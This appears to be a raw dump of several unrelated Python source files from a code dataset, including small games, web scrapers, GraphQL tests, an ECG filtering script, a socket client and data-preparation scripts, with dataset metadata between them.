markup = InlineKeyboardMarkup(menu)\n bot.sendMessage(text=test_suite(), chat_id=chat_id, reply_markup=markup)\n\n\nstart_handler = CommandHandler('start', start)\nbutton_handler = CallbackQueryHandler(button)\ntext_handler = MessageHandler(Filters.text, handle_message)\ntest_handler = CommandHandler('test', test, pass_args=True)\n\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(button_handler)\ndispatcher.add_handler(text_handler)\ndispatcher.add_handler(test_handler)\n\nif __name__ == '__main__':\n updater.start_polling()","sub_path":"now.py","file_name":"now.py","file_ext":"py","file_size_in_byte":8944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"163385589","text":"# vim: set fileencoding=utf-8 :\n'''\n\n$ > python3 jogo_nim.py\n\nBem-vindo ao jogo do NIM! Escolha:\n\n1 - para jogar uma partida isolada\n2 - para jogar um campeonato 2\n\nVoce escolheu um campeonato!\n\n**** Rodada 1 ****\n\nQuantas peças? 3\nLimite de peças por jogada? 1\n\nComputador começa!\n\nO computador tirou uma peça.\nAgora restam 2 peças no tabuleiro.\n\nQuantas peças você vai tirar? 2\n\nOops! Jogada inválida! Tente de novo.\n\nQuantas peças você vai tirar? 1\n\nVocê tirou uma peça.\nAgora resta apenas uma peça no tabuleiro.\n\nO computador tirou uma peça.\nFim do jogo! O computador ganhou!\n\n**** Rodada 2 ****\n\nQuantas peças? 3\nLimite de peças por jogada? 2\n\nVoce começa!\n\nQuantas peças você vai tirar? 2\nVoce tirou 2 peças.\nAgora resta apenas uma peça no tabuleiro.\n\nO computador tirou uma peça.\nFim do jogo! O computador ganhou!\n\n**** Rodada 3 ****\n\nQuantas peças? 4\nLimite de peças por jogada? 3\n\nVoce começa!\n\nQuantas peças você vai tirar? 2\nVoce tirou 2 peças.\nAgora restam 2 peças no tabuleiro.\n\nO computador tirou 2 peças.\nFim do jogo! O computador ganhou!\n\n**** Final do campeonato! ****\n\nPlacar: Você 0 X 3 Computador '''\n\n#if __name__ == \"__partida()__\":\ndef partida():\n print(\"\\n\\\n Bem-vindo ao jogo do NIM! Escolha: \\n\\\n \\n\\\n 1 - para jogar uma partida isolada \\n\\\n 2 - para jogar um campeonato 2 \")\n modo = int(input(\"\"))\n if modo == 1 or modo == 2:\n if modo == 1:\n print(\"\\n\\\n Voce escolheu rodada unica! \\n\\\n \\n\\\n **** Rodada unica ****\\n \")\n teste = False\n while teste == False:\n n = int(input(\"Quantas peças? \"))\n m = int(input(\"Limite de peças por jogada? \"))\n if n > 0 and n > m:\n if n % (m + 1) == 0:\n print(\"\\n\\\n Voce começa!\\n\")\n vencedor = False\n total = n\n while vencedor == False:\n peca = usuario_escolhe_jogada(total, m)\n total = total - peca\n print(\"\\n\\\n Voce tirou \",peca, \" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if total <= 0:\n print(\"Voce Ganhou\")\n return\n computador_escolhe_jogada(total, m)\n total = total - computador_escolhe_jogada(total, m)\n print(\"\\n\\\n O computador tirou \",computador_escolhe_jogada(n, m),\" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if total <= 0:\n print(\"Computador Venceu.\")\n return\n teste = True\n else:\n print(\"\\n\\\n Computador começa!\\n\")\n vencedor = False\n total = n\n while vencedor == False:\n computador_escolhe_jogada(total, m)\n total = total - computador_escolhe_jogada(total, m)\n print(\"\\n\\\n O computador tirou \",computador_escolhe_jogada(total, m),\" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if total <= 0:\n print(\"Computador Venceu.\")\n return\n user = usuario_escolhe_jogada(total, m) \n total = total - user\n print(\"\\n\\\n Voce tirou \",user, \" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if n <= 0:\n print(\"Voce Ganhou\")\n return\n else:\n teste = False\n elif modo == 2:\n campeonato()\n else:\n return partida()\n\n# funcao que pergunta quem comeca e quantas pecas.\n# funcao que vai chamar as outras funcoes\n# funcao que vai ficar com lacos para comandar quantas pecas de (n, m)\n# foram retiradas.\n# funcao que finaliza o game (n == 0)\n# variaveis (n and m) NAO NAO NAO NAO deverao ser globais\n\n#def partida(n, m):\n\n#return True\n\n# funcao tera que devolver quantas pecas foram removidas\ndef computador_escolhe_jogada(n, m):\n if n <= m:\n m = n\n n = n - m\n return m\n elif n % (m + 1) == 0:\n for i in range(1, m):\n if n % (m+1) :\n m = m - i\n #if m > 3:\n # m -= 3\n n = n - m\n return m\n else:\n teste = n % (m + 1)\n m = teste\n n = n - m\n return m\n# print(\"\\n\\\n# O computador tirou \",m,\" peça.\\n\\\n# Agora restam \",n,\"peças no tabuleiro.\\n\")\n\n# funcao tera que devolver quantas pecas foram removidas\ndef usuario_escolhe_jogada(n, m):\n tt = False\n while tt == False:\n valor = int(input(\"Quantas peças você vai tirar? \"))\n if valor < 1 or valor > m:\n print(\"\\n\\\n Oops! Jogada inválida! Tente de novo.\")\n tt = False\n elif valor >= 1 or valor < m:\n return valor\n tt = True\n\n\n\n# funcao que chama *partida() 3 vezes\ndef campeonato():\n jogos = 0\n print(\"\\n\\\n Voce escolheu um campeonato! \\n\\\n \\n\\\n **** Rodada 1 ****\\n \")\n partida(n, m)\npartida()\n","sub_path":"usp_1/semana5/release_9p.py","file_name":"release_9p.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329988225","text":"\r\n\r\n# taş, kağıt, makas oyunu\r\n\r\nprint (\"Taş,Kağıt, Makas oyununa hoş geldiniz\")\r\nprint (\"Rakibiniz bilgisayar...\")\r\n\r\ntas = 1\r\nkagit = 2\r\nmakas = 3\r\n\r\nBil_Skor= 0 # Bilgisayarin Puani\r\nOyuncu_Skor = 0 # Oyuncunun Puani\r\n\r\noyun_sayi = 10 # Oyun Sayisi Sinirlamasi\r\n\r\n\r\nwhile True:\r\n print(\"Kalan Oyun Sayısı \\\"{}\\\"\".format(oyun_sayi))\r\n import random\r\n bil_secim = random.randint(1, 3) #Bilgisayar random ile secim yapiyor\r\n Oyuncu = int(input(\"tas ise 1, kagıt ise 2, makas ise 3 tusuna basiniz...\")) #Oyuncunun tercihi\r\n\r\n if(Oyuncu == 1):\r\n print(\"\\n{}\\t{}\\n\".format(bil_secim,Oyuncu))\r\n if(bil_secim == 1): # Berabere\r\n print(\"Berabere, Skor Degismedi..\")\r\n elif(bil_secim == 2): #Kazanan bilgisayar\r\n Bil_Skor = Bil_Skor + 1\r\n print(\"Bilgisayar Kazandı.. Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif(bil_secim == 3): #Kazanan Oyuncu\r\n Oyuncu_Skor = Oyuncu_Skor + 1\r\n print(\"Siz Kazandız.. Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n\r\n elif(Oyuncu == 2):\r\n print(\"\\n{}\\t{}\\n\".format(bil_secim,Oyuncu))\r\n if (bil_secim == 1): #Kazanan oyuncu\r\n Oyuncu_Skor = Oyuncu_Skor + 1\r\n print(\"Siz Kazandıniz... Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif (bil_secim == 2): #Berabere\r\n print(\"Berabere, Skor Degismedi...\")\r\n elif (bil_secim == 3): #Kazanan bilgisayar\r\n Bil_Skor = Bil_Skor + 1\r\n print(\"Bilgisayar Kazandı... Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n\r\n elif (Oyuncu == 3):\r\n print(\"\\n{}\\t{}\\n\".format(bil_secim,Oyuncu))\r\n if (bil_secim == 1): #Kazanan cHand\r\n Bil_Skor = Bil_Skor + 1\r\n print(\"Bilgisayar Kazandı.. Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif (bil_secim == 2): #Kazanan Bilgisayar\r\n Oyuncu_Skor = Oyuncu_Skor + 1\r\n print(\"Siz Kazandız.. Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif (bil_secim == 3): #Berabere\r\n print(\"Berabere, Skor Degismedi..\")\r\n\r\n if oyun_sayi == 0:\r\n print(\"10 Tur Bitti...\")\r\n print(\"Skor: Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n\r\n break\r\n\r\n\r\n\r\n","sub_path":"TasKagitMakas2.py","file_name":"TasKagitMakas2.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"208697326","text":"\n\n\n# ============= YOUR CODE HERE ==============\n#Runs with python3 on coderunner-SEPT-2017\n#code creates a file called gender_degree_data.tsv that contains all data about the gender breakdowns of various degree majors in the US.\n#===========================================\nimport requests\nfrom bs4 import BeautifulSoup\n\nwith open('gender_degree_data.tsv', 'w') as out_file:\n\tout_file.write('\\t'.join(['Year', 'Degree_Major','Total_Bachelors','Percent_change_Bachelors','Male_Bachelors', 'Female_Bachelors', 'Female_percent_Bachelors','Total_Masters', 'Male_Masters', 'Female_Masters','Total_Doctorates','Male_Doctorates', 'Female_Doctorates']) + '\\n')\n\n\tr = requests.get('http://nces.ed.gov/programs/digest/current_tables.asp')\n\t#print(r.url)\n\tsoup = BeautifulSoup(r.text,\"html.parser\")\n\t#print(soup.prettify())\n\tfor link in soup.find_all('a', href=True):\n\t\tif 'dt16_325' in link.get(\"href\"):\n\t\t\t#print(link.get(\"href\"))\n\t\t\turl = 'http://nces.ed.gov/programs/digest/{}'.format(link['href'])\n\t\t\turl_response = requests.get(url)\n\t\t\turl_response = BeautifulSoup(url_response.text, \"html.parser\")\n\t\t\tdegree_major = url_response.find('title').text.split('Degrees in')[1].split('conferred')[0].strip()\n\t\t\t#print(degree_major)\n\t\t\tall_trs = url_response.find_all('tr')\n\t\t\tfor tr in all_trs:\n\t\t\t\t\t\t\t\t# We only want to parse entries that correspond to a certain year\n\t\t\t\tyear_header = tr.find('th')\n\t\t\t\tif year_header is None:\n\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\t# Stop parsing after all of the years are listed\n\t\t\t\tif 'Percent change' in year_header.text:\n\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t# Years always have a dash (-) in them\n\t\t\t\tif '-' not in year_header.text:\n\t\t\t\t\tcontinue\n\n\t\t\t\tyear = str(int(year_header.text.split('-')[0]) + 1)\n\t\t\t\tyear_vals = [x.text.replace(',', '').replace('†', '0').replace('#', '0') for x in tr.find_all('td')]\n\n\t\t\t\tout_text = '\\t'.join([year, degree_major] + year_vals) + '\\n'\n\t\t\tout_file.write(out_text)\n\n\n\n\n\t\t\t\n\n\n\n","sub_path":"Scrape_bs4_NCES.py","file_name":"Scrape_bs4_NCES.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"230094408","text":"import os\n\nimport graphene\nfrom graphql.execution.executors.asyncio import AsyncioExecutor\n\nfrom starlette.applications import Starlette\nfrom starlette.graphql import GraphQLApp\nfrom starlette.testclient import TestClient\n\nclass Query(graphene.ObjectType):\n hello = graphene.String(name=graphene.String(default_value=\"stranger\"))\n\n def resolve_hello(self, info, name):\n return \"Hello \" + name\n\nschema = graphene.Schema(query=Query)\napp = GraphQLApp(schema=schema)\nclient = TestClient(app)\n\n\ndef test_graphql_get():\n response = client.get(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post():\n response = client.post(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post_json():\n response = client.post(\"/\", json={\"query\": \"{ hello }\"})\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post_graphql():\n response = client.post(\n \"/\", data=\"{ hello }\", headers={\"content-type\": \"application/graphql\"}\n )\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post_invalid_media_type():\n response = client.post(\"/\", data=\"{ hello }\", headers={\"content-type\": \"dummy\"})\n assert response.status_code == 415\n assert response.text == \"Unsupported Media Type\"\n\n\ndef test_graphql_put():\n response = client.put(\"/\", json={\"query\": \"{ hello }\"})\n assert response.status_code == 405\n assert response.text == \"Method Not Allowed\"\n\n\ndef test_graphql_no_query():\n response = client.get(\"/\")\n assert response.status_code == 400\n assert response.text == \"No GraphQL query found in the request\"\n\n\ndef test_graphql_invalid_field():\n response = client.post(\"/\", json={\"query\": \"{ dummy }\"})\n assert response.status_code == 400\n assert response.json() == {\n \"data\": None,\n \"errors\": [\n {\n \"locations\": [{\"column\": 3, \"line\": 1}],\n \"message\": 'Cannot query field \"dummy\" on type \"Query\".',\n }\n ],\n }\n\n\ndef test_graphiql_get():\n response = client.get(\"/\", headers={\"accept\": \"text/html\"})\n assert response.status_code == 200\n assert \"\" in response.text\n\n\ndef test_add_graphql_route():\n app = Starlette()\n app.add_route(\"/\", GraphQLApp(schema=schema))\n client = TestClient(app)\n response = client.get(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\nclass ASyncQuery(graphene.ObjectType):\n hello = graphene.String(name=graphene.String(default_value=\"stranger\"))\n\n async def resolve_hello(self, info, name):\n return \"Hello \" + name\n\n\nasync_schema = graphene.Schema(query=ASyncQuery)\nasync_app = GraphQLApp(schema=async_schema, executor=AsyncioExecutor())\n\n\ndef test_graphql_async():\n client = TestClient(async_app)\n response = client.get(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\nclass Upload(graphene.types.Scalar):\n @staticmethod\n def serialize(value):\n return value\n\n @staticmethod\n def parse_literal(node):\n return node\n\n @staticmethod\n def parse_value(value):\n return value\n\nclass UploadMutation(graphene.Mutation):\n class Arguments:\n file = Upload(required=True)\n\n success = graphene.Boolean()\n content = graphene.String()\n\n async def mutate(self, info, file):\n return UploadMutation(content=str(file, 'utf-8'), success=True)\n\nclass Mutation(graphene.ObjectType):\n uploadMutation = UploadMutation.Field()\n\n \nupload_app = GraphQLApp(schema=graphene.Schema(mutation=Mutation), executor=AsyncioExecutor())\n\ndef test_upload_graphql(tmpdir):\n path = os.path.join(tmpdir, \"test.txt\")\n with open(path, \"wb\") as file:\n file.write(b\"\")\n \n client = TestClient(upload_app)\n response = client.post(\"/\", data={\n \"variables\": '{ \"file\": \"\"}',\n \"query\" : 'mutation ($file: Upload!) { uploadMutation(file: $file) { success content } }',\n \"file_map\" : '{ \"file0\": \"file\" }',\n }, files = {\"file0\" : open(path, \"rb\")})\n # Fake Coverage\n assert Upload.serialize(1) == 1\n assert Upload.parse_literal(1) == 1\n # Fake Coverage\n assert response.status_code == 200\n assert response.json() == {'data': {'uploadMutation': {'content': '', 'success': True}},'errors': None}\n","sub_path":"tests/test_graphql.py","file_name":"test_graphql.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"640199012","text":"dia = int(input(\"Dia da semana:\t\"))\n\nif(dia<0 or dia>6):\n\tprint(\"A entrada\",dia,\"eh invalida\")\nelse:\n\tfut = int(input(\"Dias no futuro:\t\"))\n\tif(dia+fut>6):\n\t\tX = (dia+fut)%7\n\telse:\n\t\tX = dia+fut\n\n\tif(X==0):\n\t\tX = \"domingo\"\n\telif(X==1):\n\t\tX = \"segunda\"\n\telif(X==2):\n\t\tX = \"terca\"\n\telif(X==3):\n\t\tX = \"quarta\"\n\telif(X==4):\n\t\tX = \"quinta\"\n\telif(X==5):\n\t\tX = \"sexta\"\n\telif(X==6):\n\t\tX = \"sabado\"\n\t\n\tif(dia == 0):\n\t\tdia = \"domingo\"\n\telif(dia==1):\n\t\tdia = \"segunda\"\n\telif(dia==2):\n\t\tdia = \"terca\"\n\telif(dia==3):\n\t\tdia = \"quarta\"\n\telif(dia==4):\n\t\tdia = \"quinta\"\n\telif(dia==5):\n\t\tdia = \"sexta\"\n\telif(dia==6):\n\t\tdia = \"sabado\"\n\t\t\n\tprint(\"Hoje eh\",dia,\"e o dia futuro eh\",X)","sub_path":"5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/223/users/4481/codes/1679_1107.py","file_name":"1679_1107.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"638303668","text":"from selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\noptions=Options()\r\noptions.add_argument(\"--headless\")\r\ndriver = webdriver.Firefox(firefox_options=options)\r\nx3=801\r\nlmain=[]\r\nwhile(x3<=810):\r\n print(\"processing reg number \",x3,\"\\n\")\r\n regnum=\"y16it\"+str(x3)\r\n driver.get(\"http://rvrjcce.ac.in/examcell/results/regnoresults.php\")\r\n sleep(1)\r\n x= driver.find_elements_by_tag_name(\"input\")\r\n x[0].send_keys(regnum)\r\n x[1].click()\r\n sleep(1)\r\n #####################################################################\r\n lis1=[]\r\n td=driver.find_elements_by_tag_name(\"td\")\r\n lis1.append(td[7].get_attribute(\"innerText\"))\r\n i=8\r\n k=[]\r\n j=0\r\n while (i 12):\r\n j = 0\r\n u=k.pop(0)\r\n k.insert(0,u)\r\n lis1.append(k)\r\n k=[]\r\n k.append(td[i].get_attribute(\"innerText\"))\r\n i=i+1\r\n j=j+1\r\n if(len(k)>0):\r\n u=k.pop(0)\r\n u=\"sem: \"+u\r\n k.insert(0,u)\r\n lis1.append(k)\r\n k=[]\r\n lmain.append([lis1,x3])\r\n x3=x3+1\r\n #####################################################################\r\nn=int(input(\"enter regnum\"))\r\nfor i in lmain:\r\n if(n==i[1]):\r\n for j in i[0]:\r\n print(j,\"\\n\")\r\ndriver.quit()\r\nprint(\"Finished\")\r\n","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"480581983","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt; plt.ion()\nimport scipy.signal as sgn\n\nq1 = True\nq2 = True\n\nsignal = np.loadtxt('signal.txt')\nfs = 500 # Hz\ndt = 1./fs # seconds\nt = np.linspace(0,dt*signal.shape[0],signal.shape[0],endpoint=False)\nN = len(signal)\n\n\n# Questão 1\nsig_fft = np.fft.rfft(signal)\nf_dimensionless = np.fft.rfftfreq(len(signal))\nT = dt*N\ndf = 1./T\nfhz_nf = f_dimensionless*df*N\n\nif q1:\n fig1 = plt.figure(figsize=(14,4.5))\n plt.title('Q1 (a)')\n plt.xlabel('tempo [s]')\n plt.ylabel('sinal ECG não filtrado [mV]')\n plt.plot(t,signal)\n plt.grid(b=True,which='both')\n plt.tight_layout()\n plt.savefig('Q1_a_sinal_nfilt.png')\n \n fig2 = plt.figure(figsize=(14,4.5))\n plt.title('Q1 (b)')\n plt.xlabel(u'frequência [Hz]')\n plt.ylabel(u'FFT do sinal ECG não filtrado')\n plt.plot(fhz_nf,sig_fft)\n plt.tight_layout()\n plt.savefig('Q1_b_espectro_nfilt.png')\n\n# Questão 2\n# (c)\nnotch_f = 50.3\nfny = fs/2.\n\nnotch_b, notch_a = sgn.iirnotch(notch_f/fny, 10)\nnotch_w, notch_h = sgn.freqz(notch_b, notch_a, worN=len(fhz_nf),fs=fs*2*np.pi)\n\nsig_notch = sgn.lfilter(notch_b,notch_a,signal)\n\nsig_fft_notch = np.fft.rfft(sig_notch)\nf_dimensionless_notch = np.fft.rfftfreq(len(sig_notch))\nT = dt*N\ndf = 1./T\nfhz_notch = f_dimensionless_notch*df*N\n\nif q2:\n fig3 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (c)')\n plt.xlabel('tempo [s]')\n plt.ylabel('sinal ECG filtrado Notch [mV]')\n plt.plot(t,sig_notch)\n plt.grid(b=True,which='both')\n plt.tight_layout()\n plt.savefig('Q2_c_sinal_filt_Notch.png')\n \n fig4 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (c)')\n plt.xlabel(u'frequência [Hz]')\n plt.ylabel('FFT sinal filtrado Notch ')\n plt.plot(fhz_notch,sig_fft_notch)\n plt.tight_layout()\n plt.savefig('Q2_c_espectro_filt_Notch.png')\n\n fig5 = plt.figure()\n plt.plot(notch_w/(2*np.pi), 20 * np.log10(abs(notch_h)))\n plt.xscale('log')\n plt.title('Filtro Notch')\n plt.xlabel(u'Frequência [Hz]')\n plt.ylabel(u'Amplitude [dB]')\n plt.margins(0, 0.1)\n plt.grid(which='both', axis='both')\n #plt.axvline(notch_fpass, color='green') # cutoff frequency\n plt.savefig('Q2_c_Notch_respfreq.png')\n\n'''\n# (b)\nhp_fpass = .7\nhp_fstop = .5\nfny = fs/2.\n#wpass = fpass*2*np.pi\n#wstop = fstop*2*np.pi\n#wny = fny*2*np.pi\n\nhp_ord, hp_wn = sgn.buttord(hp_fpass/fny,hp_fstop/fny,3,40)\n\n#b, a = sgn.butter(filt_ord, filt_wn, 'low')\nhp_b, hp_a = sgn.butter(4, hp_fpass/fny, 'highpass')\nhp_w, hp_h = sgn.freqz(hp_b, hp_a, worN=len(fhz_lp),fs=fs*2*np.pi)\n\nfig6 = plt.figure()\nplt.plot(hp_w/(2*np.pi), 20 * np.log10(abs(hp_h)))\nplt.xscale('log')\nplt.title('Filtro Butterworth PA')\nplt.xlabel(u'Frequência [Hz]')\nplt.ylabel('Amplitude [dB]')\nplt.margins(0, 0.1)\nplt.grid(which='both', axis='both')\nplt.axvline(hp_fpass, color='green') # cutoff frequency\n\nsig_lphp= sgn.lfilter(hp_b,hp_a,sig_lp)\n\nsig_fft_lphp = np.fft.rfft(sig_lphp)\nf_dimensionless_lphp = np.fft.rfftfreq(len(sig_lphp))\nT = dt*N\ndf = 1./T\nfhz_lphp = f_dimensionless_lphp*df*N\n\nif q2:\n fig7 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (b)')\n plt.xlabel('tempo [s]')\n plt.ylabel('sinal ECG filtrado PB + PA [mV]')\n plt.plot(t,sig_lphp)\n plt.grid(b=True,which='both')\n plt.tight_layout()\n plt.savefig('Q2_b_sinal_filt_PBPA.png')\n \n fig8 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (b)')\n plt.xlabel(u'frequência [Hz]')\n plt.ylabel('FFT sinal filtrado PB + PA')\n plt.plot(fhz_lphp,sig_fft_lphp)\n plt.tight_layout()\n plt.savefig('Q2_b_espectro_filt_PBPA.png')\n'''\n","sub_path":"TC1/develop/q2d.py","file_name":"q2d.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"212457479","text":"import cv2\nimport numpy as np\nimport cvui\nimport pyuv\n\n\nsrc1 = cv2.imread('resources/images/f1.jpg')\nsrc2 = cv2.imread('resources/images/f2.jpg')\nrows,cols = src1.shape[0],src1.shape[1]\nwindow = np.zeros((600,1024,3),dtype=src1.dtype)\nwindow[:] = (49, 52, 49)\n\nsrc1_rz = cv2.resize(src1,(cols//2,rows//2))\nsrc2_rz = cv2.resize(src2,(cols//2,rows//2))\nroi1 = window[10:rows//2+10,10:cols//2+10]\nroi1[:] = src1_rz\nroi2 = window[10:rows//2+10,20+cols//2:cols+20]\nroi2[:] = src2_rz\n\nroi_dst = window[20+rows//2:rows+20,20+cols//2:cols+20]\n\ndst = cv2.cuda.add(src1_rz,src2_rz)\nroi_dst[:] = dst\n\ncvui.init(\"CUDA:add\")\ndef wait_for_a_while(handler):\n \n cvui.imshow(\"CUDA:add\", window)\n \n cvui.update()\n key = cv2.waitKey(10)\n if key == 27:\n handler.close()\n\nloop = pyuv.Loop.default_loop()\nidler = pyuv.Idle(loop)\nloop = pyuv.Loop.default_loop()\nidler = pyuv.Idle(loop)\n\nidler.start(wait_for_a_while)\nloop.run()\n","sub_path":"projects/opencv-learning/python/cv4-cuda/01-add.py","file_name":"01-add.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399733737","text":"from django.forms.models import ModelForm\nfrom apps.notes.models import ModelNote\n\nclass FormNoteUpdate( ModelForm):\n class Meta:\n model = ModelNote\n fields = (\n 'title',\n 'description', \n 'tags',\n )\n \n def __init__(self, *args, **kwargs):\n super(FormNoteUpdate, self).__init__(*args, **kwargs)","sub_path":"apps/notes/FormNoteUpdate.py","file_name":"FormNoteUpdate.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73816062","text":"#Jared Wheet - SWDV 660 Week 7 Assignment\n\n# Import socket module \nimport socket \nimport random \nfrom certificateAuthority import getKey, validateAuthenticity, getPublicKey\n\n \n# Create a socket object \ns = socket.socket() \n \n# Define the port on which you want to connect \nport = 9500 \nkey = random.randint(0,9) \n \n# connect to the server on local computer \n# s.connect(('127.0.0.1', port)) \n \nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect(('127.0.0.1', port))\n s.sendall(getKey('Hello World', True).encode('utf-8'))\n data = s.recv(1024)\n stringData = data.decode('utf-8')\n print('Client Received Certificate: ', stringData)\n\n response = validateAuthenticity(stringData)\n if response == 'server.py':\n print('Authenticated: ', response)\n else:\n print('Error: Unknown server certificate received!')\n \n s.sendall(getKey(str(key), True, getPublicKey()).encode('utf-8'))\n print('Sending: Private Session Key')\n data = s.recv(1024)\n print('Received: ', getKey(data.decode('utf-8'), False, key))\n\n print('Sending: This is some random data')\n s.sendall(getKey('This is some random data', True, key).encode('utf-8'))\n\n data = s.recv(1024)\n stringData = data.decode('utf-8')\n print('Received: ', getKey(stringData, False, key))","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269094208","text":"import re\nimport sys\nimport argparse\nimport subprocess as sp\n\nparser = argparse.ArgumentParser(description='Process captions file.')\nparser.add_argument('--vid','-v',required=True,help='.mp4 video file')\nparser.add_argument('--rt','-t',required=True,help='Transcription file')\nparser.add_argument('--poi',required=True,help='POI ID')\nparser.add_argument('--counter',default=0,help='Utterance counter (for more videos)')\n\nargs = parser.parse_args()\n\n# frame counter\ni=int(args.counter)\n\n#\nactivation = False\n\nspk = 'id' + (args.poi).zfill(2)\n\nsp.Popen([\"mkdir\",spk]).wait()\n\nwith open(args.rt,'r') as rt, open('mp4.scp','a') as scp, open('text','a') as txt , open('utt2spk','a') as utt2spk:\n\n\tfor line in rt:\n\t\t# read times from line\n\t\ttimes = re.findall('\\d\\d:[0-5]\\d:[0-5]\\d.\\d\\d\\d',line)\n\n\t\t# if this is a times line\n\t\tif len(times) > 0:\n\t\t\t# if this is POI speech\n\t\t\tif line.split()[-1] == '1':\n\t\t\t\tbeg_t = times[0]\n\t\t\t\tend_t = times[1]\n\n\t\t\t\tutt = spk + '-' + str(i).zfill(5)\n\t\t\t\tout_vid_file = spk + '/' + utt + '.mp4'\n\n\t\t\t\tutt2spk.write(utt + ' ' + spk + '\\n')\n\t\t\t\tscp.write(utt + ' ' + out_vid_file + '\\n')\n\t\t\t\tsp.Popen(['ffmpeg', '-y', '-i', args.vid,'-ss',beg_t,'-to',end_t,out_vid_file]).wait()\n\t\t\t\tactivation = True\n\t\t\t\ti+=1\n\n\t\t# transcription line\n\t\telif len(line.split()) > 0:\n\t\t\tif activation:\n\t\t\t\ttxt.write(utt + ' ' + line)\n\t\t\t\tactivation = False\n","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492557069","text":"from matplotlib import colors as mcolors\nfrom matplotlib import pyplot as pl\nimport pandas as pd\nimport numpy as np\n\n# Colors for plots\ncolors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\ncolors = [j for i, j in colors.items()]\ncolors = iter(colors)\n\ndfjohnson = pd.read_csv('../dmax_johnson/matches.txt')\ndfjohnson['Alloy'] = [\n 'Ni400P100',\n 'Cu250Zr250',\n 'Zr300Cu150Al50'\n ]\n\ndfjohnson.rename(columns={'Alloy': 'composition'}, inplace=True)\ndfjohnson = dfjohnson[['composition', 'dexp (mm)', 'TL (K)']]\ndfjohnson.columns = ['composition', 'dmax', 'tl']\n\ndfward = pd.read_csv('../dmax_ward/matches.txt')\n\n# Composition for 500 atoms\ndfward['composition'] = [\n 'Al0Cu200Zr300',\n 'Ni300Nb200',\n 'Cu250Zr250',\n 'Cu250Zr250',\n 'Al35Cu230Zr235',\n 'Al35Cu225Zr240',\n ]\n\ndftl = pd.read_csv('../tl/tl.txt')\ndftl = dftl.dropna()\n\ndfward = dfward.merge(dftl, on=['composition'])\ndfward = dfward[['composition', 